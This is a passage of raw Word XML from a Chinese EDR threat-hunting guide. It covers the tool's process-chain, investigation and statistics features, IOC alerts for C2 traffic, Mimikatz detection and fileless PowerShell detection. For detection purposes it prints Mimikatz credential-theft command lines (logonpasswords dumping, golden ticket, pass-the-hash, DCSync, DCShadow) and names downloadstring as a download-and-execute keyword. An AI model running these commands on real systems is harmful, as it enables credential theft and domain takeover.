        <w:t>劫持调用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>everything按时间排序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，查看</w:t>
      </w:r>
      <w:r>
        <w:t>最近时间是否有未知文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如*.exe、*.</w:t>
      </w:r>
      <w:r>
        <w:t>dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、*.dat、*.sct、*</w:t>
      </w:r>
      <w:r>
        <w:t>.ps1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、*.bat等落地在</w:t>
      </w:r>
      <w:r>
        <w:t>temp、startup、appdata</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>programfile等目录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析</w:t>
      </w:r>
      <w:r>
        <w:t>系统evtx日志进行排查</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程链查看</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:left="780" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>点击数据类型“终端进程信息”，再点击单条日志的“终端进程信息”。可以查看到目标进程的进程链关系。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4196715" cy="2314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208441" cy="2321472"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4946650" cy="22294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968643" cy="2239648"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调查功能</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:left="780" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">打开威胁追踪 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>调查页面，输入ip或M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>、终端名称信息，点击“调查”，等待计算完成。点击“查看”可以看详细内容，包含了终端的详细信息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="23596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400040" cy="2359660"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="25933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400040" cy="2593340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据统计</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="422"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>通过搜索条件、日志类型、统计类型进行组合快速的归类信息，找出可疑威胁。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="2559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400040" cy="2559050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="422"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>点击“+”可以自定义统计条件：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4391660" cy="2969895"/>
            <wp:effectExtent l="0" t="0" r="889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397633" cy="2973988"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="83"/>
        <w:spacing w:before="81" w:after="81"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="32"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>终端内网</w:t>
      </w:r>
      <w:r>
        <w:t>攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="33"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络告警(IP/域名)，EDR定位终端进程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>概念</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>黑客在渗透时会用到</w:t>
      </w:r>
      <w:r>
        <w:t>C&amp;C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器，工具或数据上传下载等网络资源。E</w:t>
      </w:r>
      <w:r>
        <w:t>DR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>把终端进程的</w:t>
      </w:r>
      <w:r>
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解析的域名、I</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和端口，与I</w:t>
      </w:r>
      <w:r>
        <w:t>OC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>告警库做匹配，如果命中则告警。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接C</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传、下载信息到服务器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件攻击脚本下载执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>应对攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="60"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="81"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在告警：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="250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400040" cy="2501900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="28721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400040" cy="2872105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="60"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="81"/>
      </w:pPr>
      <w:r>
        <w:t>检索</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="60"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="81"/>
        <w:ind w:left="210" w:leftChars="100" w:firstLine="420" w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过告警进程检索，日志类型选择“告警事件”，可以筛选出告警进程的命令行信息和host信息（I</w:t>
      </w:r>
      <w:r>
        <w:t>OC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>告警的原因）。然后可以通过E</w:t>
      </w:r>
      <w:r>
        <w:t>DR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程链、调查等工具进行进一步的上下文分析。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="60"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="81"/>
        <w:ind w:left="840"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="270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400040" cy="2705100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="60"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="81"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="33"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="宋体"/>
          <w:color w:val="172B4D"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="宋体"/>
          <w:color w:val="172B4D"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>imikatz攻击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="宋体"/>
          <w:color w:val="172B4D"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>概念</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="460"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:color w:val="5B5B5B"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Mimikatz在内网渗透过程中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:color w:val="5B5B5B"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可以抓取用户的明文口令。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:color w:val="5B5B5B"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>它还能够创建票证、票证传递、hash传递、甚至伪造域管理凭证令牌</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:color w:val="5B5B5B"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>等操作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:color w:val="5B5B5B"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:color w:val="5B5B5B"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
          <w:color w:val="5B5B5B"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>攻击常常带有特定的命令参数。如：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mimikatz.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kerberos::golden</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mimikatz.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sekurlsa::pth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mimikatz.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kerberos::ptt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mimikatz.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lsadump::dcshadow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="444444"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mimikatz.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lsadump::dcsync /domain:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>应对攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="60"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="81"/>
        <w:ind w:left="840"/>
      </w:pPr>
      <w:r>
        <w:t>存在告警</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="23736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400040" cy="2373630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="23920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400040" cy="2392045"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日志检索：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检索条件按进程：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">process_name:"mimikatz.exe" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，或者按参数：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mdline:"logonpasswords "</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="29"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="25844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400040" cy="2584450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="33"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>无文件攻击_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>powershell检测</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>概念</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="宋体"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Powershell.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="宋体"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>exe可以从网络下载脚本内容并在内存中执行。本地磁盘不会有脚本文件生成。黑客常常利用powershell的这个特性来执行恶意脚本，躲避杀软的监控。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="35"/>
      </w:pPr>
      <w:r>
        <w:t>方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>owershell在无文件执行时命令行有明显的关键字，如downloadstring等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="30"/>
        <w:ind w:left="780" w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>例如：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
